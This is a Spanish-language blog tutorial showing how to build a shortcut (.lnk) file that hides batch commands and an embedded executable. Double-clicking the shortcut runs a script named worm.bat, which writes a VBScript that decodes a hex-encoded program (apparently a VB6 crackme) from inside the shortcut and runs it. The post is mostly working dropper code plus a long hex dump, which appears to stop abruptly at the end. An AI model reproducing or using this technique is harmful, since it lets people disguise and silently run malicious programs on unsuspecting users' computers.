domingo, 5 de marzo de 2017

Unir Archivos Exe,Vbs y Bat a Un Acceso Directo lnk

Ase mucho en mis principios uní un archivo lnk con un exe este era ejecutable desde el lnk, asiendo doble clic sobre el y ahorita que me acuerdo yo en ese entonces usaba el comando debug del antiguo símbolo del sistema para recrear el ejecutable.

trate este tema en el siguiente hilo
https://foro.elhacker.net/analisis_y_diseno_de_malware/unir_autorun_y_exe-t271077.10.html

en el un usuario me tomo a locura lo que estaba diciendo eso fue 2009 pero yo cuando había hecho esos experimentos por llamarlos así hacia mas años, aun no recuerdo si seria en el 2007 o 2006 y como dije usaba el comando debug, yo nunca dije en el foro como lo hice hasta ahora lo explico.

primeramente crearemos un acceso directo al símbolo del sistema en el escritorio, no explicare como crearlo creo que ya tienen las bases suficientes para saber.

 ya que lo tengan creado daremos clic derecho sobre el y daremos clic en propiedades y en el cuadro de texto de destino que es este:



pondremos lo siguiente

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

y ahora abriremos el bloc de notas y dentro de el pondremos los comandos de nuestro bat, yo pondré estos


OJO= fíjense que deje un espacio de 3 lineas y después puse los comandos pueden ser 2 o una, esto es para que no se mezcle con los bites del lnk.

ahora pasaremos a aguardarlo, yo le pondré 96.txt, ya que no es necesario que lleve la extencion bat

ya que tenemos el archivo lnk y los comandos que irán debajo del lnk pasaremos a juntar los, para eso abriremos el símbolo del sistema y nos fijamos en la carpeta del escritorio y teclamos lo siguiente

Nota: mi archivo lnk tiene por nombre "6.lnk" y el archivo que lleva los comandos se llama "96.txt"

copy /b 6.lnk+96.txt w.lnk


nos que daría un archivo llamado "w.lnk", que al ejecutarlo ejecuta los comandos que tenia el archivo 96.txt.

creo que ya tienen una idea de como seguir, así que crearemos un bat que genere un archivo vbs, el cual generara un exe así que el código del bat seria este

@echo off
echo option explicit                                           >worm.vbs
echo Dim x,objsystem,file,i,f,largo,bit,bytes,shell            >>worm.vbs  
echo Set objsystem = CreateObject("Scripting.FileSystemObject")>>worm.vbs 
echo set shell = createobject("wscript.shell")                 >>worm.vbs
echo Set file = objsystem.getFile("w.lnk")                     >>worm.vbs  
echo largo=file.size                                           >>worm.vbs 
echo Set f = file.OpenAsTextStream()                           >>worm.vbs  
echo for i=1 to largo                                          >>worm.vbs
echo     bytes = bytes + f.read(1)                             >>worm.vbs  
echo next                                                      >>worm.vbs 
echo f.close                                                   >>worm.vbs
echo bit=split(bytes,"==codingvbs==")                          >>worm.vbs  
echo set file = objsystem.createtextfile("Crackme1.exe")       >>worm.vbs 
echo for x=1 to len(bit(2)) step 2                             >>worm.vbs 
echo    bytes = mid(bit(2),x,2)                                >>worm.vbs
echo    file.write(chr("&H" + bytes))                          >>worm.vbs
echo next                                                      >>worm.vbs
echo file.close                                                >>worm.vbs
echo wscript.sleep 2000                                        >>worm.vbs
echo shell.run "Crackme1.exe",1                                >>worm.vbs
wscript.exe worm.vbs


al bat lo llamaremos "comandos.bat", ahora crearemos un archivo que contendra los bites del exe en valores hexa decimales, al cual llamaremos "code.txt" y contendrá lo siguiente

==codingvbs==4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000B80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000008F8AF9DBCBEB9788CBEB9788CBEB978848F79988CAEB9788A2F49E88CAEB978822F49A88CAEB978852696368CBEB97880000000000000000504500004C0103007180B7430000000000000000E0000F010B01060000200000002000000000000008120000001000000030000000004000001000000010000004000000010000000400000000000000005000000010000044DF00000200000000001000001000000000100000100000000000001000000000000000000000004426000028000000004000001406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280200002000000000100000A80000000000000000000000000000000000000000000000000000002E746578740000008C190000001000000020000000100000000000000000000000000000200000602E64617461000000040A0000003000000010000000300000000000000000000000000000400000C02E727372630000001406000000400000001000000040000000000000000000000000000040000040C52C25411000000000000000000000004D535642564D36302E444C4C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FCB149738D69497373104A734E624973D568497324734773E14B3C7302624973A7663C732C453C73E3423C73292F48739A6249739A63497364B34973AF443C736FD83B7378B73B738A69497385E33C7309B449737C6747735B4E3C731D6649734E6349737F9D4A73A1B24973CE624973CE63497309644873026349733D5D49733EDE3A73CA164A73DC9D4A7336B14973EA204973BAB44973350F4973FE473C73D7503C73000000001500100002234000000000000A234000C0104000000000000100000001000000DA224000000000007DC39425AD49B25405000800E423400000000000EB23400005000800E324400000000000EA24400005000800F425400000000000FB2540000000000000000000FF253C104000FF2558104000FF2564104000FF2530104000FF251C104000FF256C104000FF250C104000FF257C104000FF2534104000FF2578104000FF2570104000FF2560104000FF2548104000FF255C104000FF2510104000FF2504104000FF258C104000FF2500104000FF2598104000FF2568104000FF2538104000FF2550104000FF2594104000FF2590104000FF2544104000FF2508104000FF2584104000FF252C104000FF2514104000FF2520104000FF25A0104000FF259C104000FF2518104000FF2528104000FF2574104000FF2524104000FF2588104000FF2554104000FF2540104000FF254C104000FF2580104000000068F4164000E8EEFFFFFF000000000000300000004000000000000000A1B68322BCF5C74EA7E4A3927EB7E3510000000000000100000000000000000050726F796563746F310000000000000000000000FFCC310003FE22228A455D81448B4E885B15F0513142E3E915F7541E4B93B8F05E7BD708073A4FAD339966CF11B70C00AA0060D393000000000000000000000000000000000000000000000000000000000000000000000000E803000062030000000500466F726D31000D011D002020202020437261636B6D65202337202020506F722020466C616D6572001901004200220123060300006C740000FE0200000000010001002040000001000400E8020000160000002800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000240500466F726D310026002700352D000000B3010000880E0000710700004603FF011C0000000106004672616D653100030578007800A70D9F06120000FF0135000000020A007478745F53657269616C000204F0006801C70B77010B0F00496E677265736120456C20436F6465001202002402FF032B000000030800436F6D6D616E6431000401090056657269666963617200044803380417077701110100FF02020400000007000000DC1E400050000000FE22228A455D81448B4E885B15F0513100000000000000000000000000000000000000009001000000000000000000000000000000000000000000004104000000000000581240004C00000056423521F01F56423645532E444C4C00000000002A000000000000000000000000000A000A0C000009040000000000008C1740001CF0300000FFFFFF080000000100000001000000E9000000A41640009C1640001412400078000000810000008B0000008C000000000000000000000000000000000000004B657947656E6D650050726F796563746F31000050726F796563746F31000000F4010000E41C400000000000E021400040264000FC0900000830400016114000003040002A005C00410043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C0046006C0061006D00650072005C004D0069007300200064006F00630075006D0065006E0074006F0073005C004800610063006B0069006E0067005C0043007200610063006B0069006E0067005C004D0069007300200043007200610063006B006D00650073005C0043007200610063006B006D006500200037005C00500072006F0079006500630074006F0031002E0076006200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1640000100000001000000E41C4000000000003C214000FFFFFFFF00000000381D40000830400001000000401A4000000000000000000000000000401A400001000000A01D400000000000441A4000010000004C1A400000000000481A4000040000004C1A40000400B70168006C00EC1A4000F032400000000000A0DA200000000000B01D4000C01D4000400018003C000000D01D4000020003000000000000000000FC1A400050CF2000E01D4000020003004000110040000000681E4000030003000000000000000000741B400060CF2000781E40000300030040000D0044000000841E4000010003000000000000000000D01B400070CF2000941E40000100030040001F00480000009C1E4000FFFFFFFF00000000000000001C1C400080CF2000AC1E4000FFFFFFFFD21C4000DF1C4000B81C4000C51C4000000000004C1A4000C8194000EE114000F4114000FA11400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000741A4000C8194000EE114000F4114000FA114000B01C400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009C1A4000C8194000EE114000F4114000FA1140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C41A4000C8194000EE114000F4114000FA114000000000000000000000000000000000000000000000000000BD1C4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000816C24043F000000E933050000816C240447000000E976060000816C2404FFFF0000E949070000816C2404FFFF0000E94C080000000000002C3040007C214000FFFFFFFF000000001C304000988DAE1D6306F14EABE1CAAE39F6073E0A00010001000100381D4000000000000000000000000000841D4000090400000A0C00000000000002000000C8194000FFFFFFFF201F40000000000000000000000000007C1D400005000000681D4000FFFF0000838001000000000073007400650069006E002900101F40001C1F4000466F726D3100000050726F796563746F3100000042E3E915F7541E4B93B8F05E7BD7080757CC2B8E8DA552469C17B77ECC47F6FCFE22228A455D81448B4E885B15F0513144E923EC7903FB479066AA7CD42C4AF7E24EAD339966CF11B70C00AA0060D3937478745F53657269616C00002E3DFBFCFAA06810A73808002B3371B5433A5C4172636869766F732064652070726F6772616D615C4D6963726F736F66742056697375616C2053747564696F5C564239385C5642362E4F4C420000000056420000EC1D4000000000000600000009000000FC1D40003C1E4000D03240000000000000000000A8161C00F24EAD339966CF11B70C00AA0060D393436F6D6D616E643100000000EA4EAD339966CF11B70C00AA0060D3934672616D653100003A4FAD339966CF11B70C00AA0060D393466F726D00000000090000006B65726E656C333200000000120000004973446562756767657250726573656E74000000B81E4000C81E400000000400D43240000000000000000000A1DC3240000BC07402FFE068DC1E4000B8A0114000FFD0FFE0000000436F72726563746F000000004D616C000C0054000000000000000000E14EAD339966CF11B70C00AA0060D393F14EAD339966CF11B70C00AA0060D3937200000043006F00720072006500630074006F002E002E002E002E00460065006C0069007300690064006100640065007300200041006D00690067006F002000410068006F00720061002000500072006F006700720061006D006100200045006C0020004B0065007900670065006E002E002E002E0000001000000043006F00720072006500630074006F000000000022000000530065007200690061006C00200049006E0063006F00720072006500630074006F0000000A0000004500720072006F0072000000564241362E444C4C000000005F5F766261467265655661724C697374000000005F5F766261566172447570005F5F7662614F626A53657400000000005F5F76626153657453797374656D4572726F72005F5F7662614578697450726F630000005F5F766261467265654F626A000000005F5F76626146726565537472000000005F5F76626148726573756C74436865636B4F626A000000005F5F766261493453747200005F5F7662614F6E4572726F72000000005F5F766261467049340000003C2140000000000000000000000000000000000000000000F4204000182140000000F906FFFF00000000000002000360D42040000000000000000000000000001E0000000000FD06FFFF00000000000003000360D42040000000000000000000000000001E00000000000000C8194000FFFFFFFF000000000200000000000000E020400000000000D8204000D4204000D4204000000000000000000000000000540000000400000000000000E41C4000FFFFFFFF00000000D4204000000000000000000000000000FFFFFFFF00000000401E4000D01D4000E0324000401E4000681E4000E4324000401E4000841E4000E8324000401E40009C1E4000EC324000CCCCCCCCCCCCCCCCCCCCCCCCE9E9E9E9CCCCCCCCCCCCCCCCCCCCCCCC558BEC83EC14681611400064A100000000506489250000000083EC205356578965ECC745F0A81040008B75088BC683E0018945F483E6FE89750833DB895DF88B0E56FF5104895DE0895DDC66837E38FF750FDD05D0104000FF15881040008946346A01FF15241040008B1656FF9200030000508D45DC50FF15281040008BF88B0F8D55E05257FF91A0000000DBE23BC37D1268A0000000682C1F40005750FF15181040008B45E050FF15741040008946348D4DE0FF159C1040008D4DDCFF15A01040008B463499B911000000F7F989563483FA0275148B1656FF92F80600003BC37D2968F8060000EB158B75088B0656FF90FC06000085C07D1268FC06000068C01D40005650FF1518104000FF15201040009B681E234000EB138D4DE0FF159C1040008D4DDCFF15A0104000C3C38B45088B0850FF51088B45F48B4DE464890D000000005F5E5B8BE55DC20400909090558BEC83EC0C681611400064A100000000506489250000000083EC185356578965F4C745F8D81040008B75088BC683E0018945FC83E6FE568975088B0EFF510433DB895DE866895E38E866FBFFFF8BF8FF15141040003BFB740666C74638FFFF8B1656FF9204030000508D45E850FF15281040008BF053568B0EFF918C0000003BC3DBE27D12688C000000683C1F40005650FF15181040008D4DE8FF15A0104000895DFC68F6234000EB0A8D4DE8FF15A0104000C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8E810400033F68975FC8B4508508B08FF51048B3D84104000B904000280894DB4B80A000000894DC4BB080000008975BC8975AC89758C8D558C8D4DCC8975DC8975CC89759C8945AC8945BCC74594C81F4000895D8CFFD78D559C8D4DDCC745A4501F4000895D9CFFD78D55AC8D45BC528D4DCC50518D55DC5652FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146807254000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC2040090909090909090909090558BEC83EC0C681611400064A100000000506489250000000081EC880000005356578965F4C745F8F810400033F68975FC8B4508508B08FF5104B9040002808975DC8975CC8975BC8975AC89759C89758C8B3584104000894DB4B80A000000894DC4BF080000008D558C8D4DCC8945AC8945BCC7459408204000897D8CFFD68D559C8D4DDCC745A4E01F4000897D9CFFD68D55AC8D45BC528D4DCC50518D55DC6A1052FF152C1040008D45AC8D4DBC508D55CC518D45DC52506A04FF150810400083C4146818264000EB1C8D4DAC8D55BC518D45CC528D4DDC50516A04FF150810400083C414C3C38B4508508B10FF52088B45FC8B4DEC5F5E64890D000000005B8BE55DC204009090909090909090909E9E9E9E6C260000FFFFFFFFFFFFFFFF14270000001000000000000000000000000000000000000000000000222700002C2700003A2700004E2700005E2700006C270000822700009A270000AA270000BA270000CA27000053020080D8270000EA270000FC2700000628000014280000282800003A280000482800005E28000068280000842800009A280000A8280000BA280000CE280000D8280000EA280000FC2800000A2900001C290000640000802A29000038290000442900004E29000058290000622900006C2900007C290000000000004D535642564D36302E444C4C000000005F4349636F73000000005F61646A5F667074616E000000005F5F766261467265655661724C697374000000005F61646A5F666469765F6D36340000005F61646A5F667072656D310000005F5F76626153657453797374656D4572726F720000005F5F76626148726573756C74436865636B4F626A000000005F61646A5F666469765F6D33320000005F5F7662614578697450726F630000005F5F7662614F6E4572726F72000000005F5F7662614F626A5365740000005F61646A5F666469765F6D313669000000005F61646A5F66646976725F6D3136690000005F434973696E000000005F5F76626143686B73746B0000004556454E545F53494E4B5F416464526566000000446C6C46756E6374696F6E43616C6C0000005F61646A5F66706174616E0000004556454E545F53494E4B5F52656C65617365000000005F4349737172740000004556454E545F53494E4B5F5175657279496E746572666163650000005F5F76626145786365707448616E646C6572000000005F61646A5F667072656D000000005F61646A5F66646976725F6D3634000000005F5F7662614650457863657074696F6E000000005F43496C6F67000000005F61646A5F666469765F6D333269000000005F61646A5F66646976725F6D3332690000005F5F7662614934537472000000005F61646A5F66646976725F6D3332000000005F61646A5F666469765F720000005F5F7662615661724475700000005F5F766261467049340000005F43496174616E0000005F616C6C6D756C0000005F434974616E000000005F4349657870000000005F5F76626146726565537472000000005F5F766261467265654F626A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B004